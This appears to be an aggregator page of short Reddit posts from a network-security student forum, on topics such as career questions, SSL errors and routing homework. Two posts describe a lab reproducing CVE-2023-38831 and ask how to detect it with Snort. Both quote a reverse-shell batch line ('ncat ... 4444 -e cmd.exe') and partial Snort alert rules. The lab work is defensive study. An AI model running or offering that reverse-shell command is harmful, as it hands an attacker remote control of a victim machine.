Snort rule alerts but unable to block attack
Reddit » Netsecstudents
by /u/Avriuss
37m ago
Hi everyone, I'm currently trying to detect a reverse TCP connection from W10 to Kali. The attack is initially based off CVE-2023-38831, where the bait file will run a .bat script once opened. Currently, my .bat file looks like this:
echo off
ncat xx.xx.xx.xx 4444 -e cmd.exe
Now here's the problem: my alert rule is able to detect the attack, but when I change the alert to block, it does not seem to be able to block the attack. What should I do? My alert rule:
alert tcp $HOME_NET 4444 -> $EXTERNAL_NET any (msg:"[MITRE ATT&CK T1204.002] User Execution: Malicious File"; sid:10000001; rev:1 ..read more
Are there any affordable online Masters programs that I can do?
Reddit » Netsecstudents
by /u/picante-x
37m ago
I have a bachelor's in cybersecurity. However - my job is more of a Model-Based Systems Engineer, I need to understand telecom, network and Linux more in depth. I believe I may have to branch out of the cybersecurity degree and may have to get a Systems Engineering or Network Engineering degree. Looking at below $10k because my employer only covers $3k for the entire year. Scholarships would be a great plus.
How can I detect a reverse TCP connection from Windows 10 to Kali?
Reddit » Netsecstudents
by /u/Avriuss
37m ago
Hi everyone, I'm currently trying to detect a reverse TCP connection from W10 to Kali. The attack is initially based off CVE-2023-38831, where the bait file will run a .bat script once opened. Currently, my .bat file looks like this:
echo off
ncat xx.xx.xx.xx 4444 -e cmd.exe
So here's the issue: I can't seem to think of anything to put in the content field for my Snort rule. I've tried ncat, (the IP), and others, but nothing seems to be alerting Snort. Do you guys have any idea as to how I can do it? Here's my current rule:
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"[MITRE ATT&CK ..read more
Web API testing techniques & labs
Reddit » Netsecstudents
by /u/albinowax
37m ago
What is Loader Lock?
Reddit » Netsecstudents
by /u/elliotkillick
3d ago
Discounted InfoSec Certs for the Holidays
Reddit » Netsecstudents
by /u/HedgehogCritical7645
3d ago
Hey everyone! My friend’s information security certification institute is giving friends and family codes (good through the new year) to us and I wanted to pass it along. X63CTE7TVC66
Negligible amount of clients in android/ios devices getting SSL error
Reddit » Netsecstudents
by /u/Hefty-Entrance-2706
3d ago
I've read this stuff: We've tried mobile data and different ISPs and the problem seems to persist. https://maulwuff.de/research/ssl-debugging.html https://serverfault.com/questions/872424/why-are-some-people-getting-a-connection-not-secure-page-when-accessing-my-serve Would SSL pinning fix this issue of very few clients getting an SSL error? https://developers.wultra.com/components/ssl-pinning-android/1.3.x/documentation/ There is an option to install a CA cert on Android, but is it worth the hassle or is there something simpler and efficient? I honestly don't understand why the hell I'm getting ..read more
Routing help (packet tracer)
Reddit » Netsecstudents
by /u/NervousScreen2865
3d ago
Just to note, I'm super new to networking. I have this assignment where I have to make all the devices in this network be able to ping each other. So far the PCs in buildings 1 and 2 can ping each other and they can ping both the core and gateway router. But when I try to ping the server from the PCs I get the 'destination host unreachable' error. I have static routes that direct all traffic to the right interface on the gateway and core routers. (The server can ping the gateway router, and also FYI when I try to ping the PCs from the server it doesn't say 'destination unreachable', just ..read more
Youtube Short: Using Dynamic Authorization & Zero Trust in Controlled Environments
Reddit » Netsecstudents
by /u/zolakrystie
3d ago
Career Q
Reddit » Netsecstudents
by /u/Stunning_Art5638
3d ago
Hi everyone, I have been offered a role as an Analyst on a Cyber Monitoring team. I have no technical CS background but have experience in information systems and business processes. I did well in my interview because I researched and conceptually understood the value of educating people and using certain safeguards to defend organizational information. The role would be a pivot into a new field and I believe I would excel in reporting writing. This said, I am curious as to whether I would require a coding background/knowledge to really thrive and build a career in the space long term? What a ..read more